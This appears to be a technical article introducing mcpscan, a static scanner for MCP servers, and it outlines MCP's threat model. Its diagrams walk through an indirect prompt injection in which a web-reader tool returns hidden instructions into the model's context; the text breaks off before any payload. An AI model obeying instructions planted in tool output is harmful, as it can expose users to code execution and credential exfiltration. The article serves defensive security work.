Threat Modeling the Model Context Protocol: Securing Agentic Tools with mcpscan A developer has released mcpscan, a lightweight static supply-chain security scanner built specifically for Model Context Protocol (MCP) servers and Claude Code projects. The tool audits MCP server implementations and local configurations for command injection, hardcoded secrets, and excessive permission scope, emitting SARIF 2.1.0 or JSON reports. The work outlines MCP's client-host-server threat model, including indirect prompt injection and credential exfiltration risks from over-privileged tools. The Model Context Protocol MCP has emerged as an open standard connecting LLM interfaces such as Claude Desktop and Claude Code to local and remote execution environments. By allowing models to execute system tools, query databases, and parse filesystems, MCP bridges the gap between passive text generation and active agentic execution. However, granting AI agents execution capabilities introduces direct attack vectors against host environments. Because MCP servers execute locally with user-level privileges, compromised or improperly sanitized tools can lead to arbitrary code execution, indirect prompt injection, credential exfiltration, and privilege escalation. This article breaks down the threat model of the Model Context Protocol, analyzes primary attack vectors, and demonstrates static analysis auditing using mcpscan . php graph TD User User Prompt -- Client MCP Client / Claude Engine Client -- |JSON-RPC via stdio/SSE| Host MCP Host Environment Host -- Server1 Local System Tools / CLI Host -- Server2 Remote File / Database API Server2 -- |Untrusted External Data| Client style Client fill: 1f2937,stroke: 4b5563,color: fff style Host fill: 111827,stroke: 374151,color: fff style Server1 fill: 1f2937,stroke: 4b5563,color: fff style Server2 fill: 1f2937,stroke: 4b5563,color: fff MCP operates on a client-host-server architecture where host applications communicate with servers via JSON-RPC over stdio or Server-Sent Events SSE . Unlike REST APIs that rely on strict schema validation and deterministic caller authorization, MCP sits directly beneath an LLM reasoning engine. This architecture introduces unique operational vulnerabilities. When an MCP tool fetches untrusted external data such as parsing a webpage, reading an email header, or scanning a git commit , malicious payloads embedded in that data can manipulate the client model's context window. sequenceDiagram autonumber actor User participant Client as MCP Client participant Server as MCP Tool Web Reader participant Attacker as External Target Site User- Client: Fetch summary of target site Client- Server: Call read url "http://target.site" Server- Attacker: HTTP GET Attacker-- Server: HTML containing hidden payload Server-- Client: Returns payload in context Note over Client: Payload instructs LLM to execute: